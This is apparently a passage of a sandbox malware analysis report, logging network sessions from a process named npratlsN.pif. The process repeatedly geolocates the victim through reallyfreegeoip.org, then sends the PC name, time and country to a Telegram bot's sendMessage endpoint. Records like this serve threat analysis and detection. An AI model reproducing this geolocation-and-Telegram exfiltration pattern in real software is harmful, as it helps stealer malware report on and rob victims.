2025-01-14 07:08:39 UTC	859	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:39 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2153308 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KBwwoMDsqKfZhldyMfGQcUfjaCAQwBfCj3sVCINL2BqYnlFJV9YYPCuCM7%2F8xFSI5Po%2F238D%2BaQQYmc5ds7BxFF7ZCQC03C9wEN01KCokA%2FxT%2BfTkUFQm7VsbDY6nG9tKFfTSuBp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901bcbcc2b411899-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1592&min_rtt=1575&rtt_var=603&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1853968&cwnd=153&unsent_bytes=0&cid=501704d3efc4f23b&ts=226&x=0"
2025-01-14 07:08:39 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	52766	104.21.16.1	443	3592	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:08:41 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-14 07:08:41 UTC	853	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:41 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2153310 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PWDOdTj7W6kHdBw43mT2yNOgZ2DvwT9JjJtnCaFtreOqS7e5hBQJDbF%2BpjX9XQbddMqeHbGCNyp4rGwLEQGcIPPbjKSNdkx9M2BRBj4kkKTAOqOiIoX8z0Z473dSC12d%2BkL5sKfg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901bcbd798371899-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1593&min_rtt=1588&rtt_var=605&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1792510&cwnd=153&unsent_bytes=0&cid=69d1d0f252e7cc95&ts=197&x=0"
2025-01-14 07:08:41 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	52769	104.21.16.1	443	3592	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:08:43 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-14 07:08:43 UTC	863	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:43 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2153312 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3ce2L39OREsjzHw%2FS7U2VRjZPoDzC7OCwXhTmUV32LlFOeIP1DFkbP37ICQTw8WxoWo%2BzvzHPRNPBNyRACJjptb2%2FhnwuvExp3E7QRYiSHjC0YEk5q%2F%2BzDLdQ%2BO%2BSftVzAdTZX2s"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901bcbe1bbae41ba-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1749&min_rtt=1707&rtt_var=670&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1710603&cwnd=192&unsent_bytes=0&cid=d52b997a907f14b2&ts=159&x=0"
2025-01-14 07:08:43 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	52772	104.21.16.1	443	3592	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:08:44 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-14 07:08:45 UTC	863	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:45 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2153314 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=12xMOppDJRvd%2BHiwsPhRIJPGGDaER2IeaORrHv3N1qYyF%2BFZEcarP2Up%2BiWxIWQB2hyBdDXUVmqM%2FOiWpGMx4ZpwFQ1%2Brf52QlgRGvO8On5H%2FhzIeAcmlPW0xTP4k%2FyuJa6H4WHS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901bcbed4a1e1899-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1971&min_rtt=1598&rtt_var=1346&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=636720&cwnd=153&unsent_bytes=0&cid=b874360c97fe72f7&ts=153&x=0"
2025-01-14 07:08:45 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	52771	104.21.16.1	443	6036	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:08:44 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-14 07:08:45 UTC	851	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:45 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2153314 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vYX5RtZCsA8ysdXwC4oN4PiA0kK%2F17jN8TMT9JvYGIsl2xPSXuIWPJG5nuPx17Rpcq0NNiNH0KTDQEDZceGiP6bdK8Y559XPfPUJrIkJJj8uGkdoDUcm4t9gEdG6pD0kDAxaJA0D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901bcbed7f087293-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2239&min_rtt=1964&rtt_var=1288&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=700239&cwnd=158&unsent_bytes=0&cid=020d4913a2d4bbb4&ts=190&x=0"
2025-01-14 07:08:45 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	52775	104.21.16.1	443	6036	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:08:45 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-14 07:08:46 UTC	857	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:46 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2153315 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T9P%2FggjRNWaiBNQ1o996j3dJ32eFrUTrfeon1y2i4DhjwPjopyNISw6U8aF0qKzgzjCvKmEw%2BkMRNGKpJLk7ZH3m6oLzkTlRnFpzVji%2FiFDQ6sUGv3u4zqgZ1Xf%2Bvj8DSlhVsBkf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901bcbf3aaf44388-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1553&min_rtt=1543&rtt_var=600&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1791411&cwnd=221&unsent_bytes=0&cid=94f914d35a87ed7d&ts=156&x=0"
2025-01-14 07:08:46 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	52776	104.21.16.1	443	3592	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:08:46 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-14 07:08:46 UTC	855	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:46 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2153315 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SgruX7yz8EsSc2LSbBbosI74OQacc9Bo8U2vhP0qDUSgSkt9Qqco%2FpMg0Pr8OBnVrB4zsiJh0Cbs7Lkwh59kzVTbI%2B1V8gch7UsVu4OUkcTae4rSWyP9%2FLRDLp7Li8bwTvh9vv95"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901bcbf62a2141ba-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1686&min_rtt=1686&rtt_var=634&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1724748&cwnd=192&unsent_bytes=0&cid=3f2aa1679fcb9384&ts=133&x=0"
2025-01-14 07:08:46 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	52779	104.21.16.1	443	6036	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:08:47 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-14 07:08:47 UTC	859	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:47 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2153316 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4lgFIzhZtYMMcW2go%2Bw6uin6w6z%2BWZg4CNzLmvUgpMc%2ByatHMj2LvXw%2FTNPH1is1ztIDs%2Fh3jRVAeJKsJEjvRbaqT724A4Tw9Koi2VB6M4brkprDpYrMww0zyc7l3VppKrBbVhTu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901bcbfcceff41ba-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1708&min_rtt=1701&rtt_var=653&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1658148&cwnd=192&unsent_bytes=0&cid=4d0044a1b9184365&ts=148&x=0"
2025-01-14 07:08:47 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	52780	104.21.16.1	443	3592	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:08:47 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-14 07:08:47 UTC	861	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:47 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2153317 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mJjYJYBaFPf1uSzKPSL7gs7SJVuy8a%2BKEEwRj91O54%2FCWWQWILr7HQSFFM61PS%2F%2BwiMv14LLGFKQSbot5tiTYkiCmsVMX1GePmQr9qu8xguJLv%2F9fg5zc141KNDoKu1WlZK6%2FUAs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901bcbff289141ba-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2134&min_rtt=1612&rtt_var=977&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1811414&cwnd=192&unsent_bytes=0&cid=da47e1c0aa814e01&ts=153&x=0"
2025-01-14 07:08:47 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	52782	149.154.167.220	443	3592	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:08:48 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2014/01/2025%20/%2014:32:10%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20585948%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-14 07:08:48 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 14 Jan 2025 07:08:48 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-14 07:08:48 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	52783	104.21.16.1	443	6036	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:08:48 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-14 07:08:48 UTC	861	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:48 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2153318 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I85oL8t60zXGhR8qZonh3LIXgPZ19Iwt%2BCQdo8wDkqE3CQJ9srBVP6dpEDrULgSrVLRORh97NIJtcfrkuZiFLLttYeh%2BQ8C1vk%2BZ1dANI%2FMb4C7G2VXjIrz76IWOoArwUF%2Bb%2Bk5z"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901bcc05eedc7293-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1898&min_rtt=1897&rtt_var=714&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1530398&cwnd=158&unsent_bytes=0&cid=c353d6bb1dedd6a3&ts=132&x=0"
